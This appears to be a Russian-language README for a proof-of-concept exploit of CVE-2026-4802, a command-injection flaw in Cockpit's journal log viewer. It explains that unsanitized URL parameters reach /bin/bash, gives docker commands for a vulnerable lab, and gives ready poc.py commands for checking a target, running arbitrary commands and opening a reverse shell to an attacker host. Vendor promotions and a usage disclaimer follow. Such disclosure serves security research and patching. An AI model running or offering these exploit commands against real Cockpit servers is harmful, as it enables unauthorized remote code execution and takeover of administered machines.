
Доказательство концепции эксплуатации для CVE-2026-4802, уязвимости внедрения команд в интерфейсе системных журналов Cockpit, позволяющей выполнение произвольных команд и получение обратных оболочек.
Эксплойт-доказательство концепции для CVE-2026-4802, удаленного выполнения кода через внедрение команд в интерфейсе системных журналов Cockpit (loadServiceFilters())
Соберите и запустите уязвимое окружение:
$ docker build -t cockpit-vuln .
$ docker run --rm -d --privileged -p 9090:9090 cockpit-vuln
# Проверка уязвимости цели
$ python3 poc.py --url http://localhost:9090 --user viewer --pass viewer --mode check
# Выполнение произвольных команд
$ python3 poc.py --url http://localhost:9090 --user viewer --pass viewer --mode exec --cmd "id"
# Обратная оболочка
$ python3 poc.py --url http://localhost:9090 --user viewer --pass viewer --mode reverse --lhost 10.0.0.1 --lport 4444

pkg/systemd/logsJournal.jsx)Функция loadServiceFilters() в pkg/systemd/logsJournal.jsx формирует shell-команды, объединяя массивы в строки с экранированием только пробелов, перед передачей их в /bin/bash -ec. Управляемые пользователем параметры из фрагмента URL страницы журналов (например, --since=) попадают в этот путь выполнения кода без санитизации, что позволяет внедрять метасимволы оболочки, такие как подстановка команд ($(...)).
Этот инструмент предназначен только для образовательных и исследовательских целей. Используйте его только на системах, которыми вы владеете или на тестирование которых имеете явное разрешение. Автор не несет ответственности за любое неправомерное использование или ущерб, причиненный этой программой.
QuimeraX Intelligence — это передовая платформа EASM и киберразведки, специализирующаяся на выявлении критических уязвимостей в сложных системах. Платформа проактивно отслеживает, обнаруживает и оповещает клиентов об угрозах безопасности, обеспечивая прозрачность и быстрое реагирование на потенциальные риски. Клиенты получают немедленные уведомления и подробные отчеты, если их системы оказываются уязвимыми, что позволяет им предпринять защитные меры. узнать больше
Hakai Security — это компания в сфере кибербезопасности, основанная профессионалами в области безопасности, стремящаяся к техническому совершенству. Мы предлагаем индивидуальные решения в области безопасности, включая продвинутое тестирование на проникновение, реалистичные Red Team-симуляции и практики безопасной разработки для проактивной защиты активов наших клиентов от evolving киберугроз.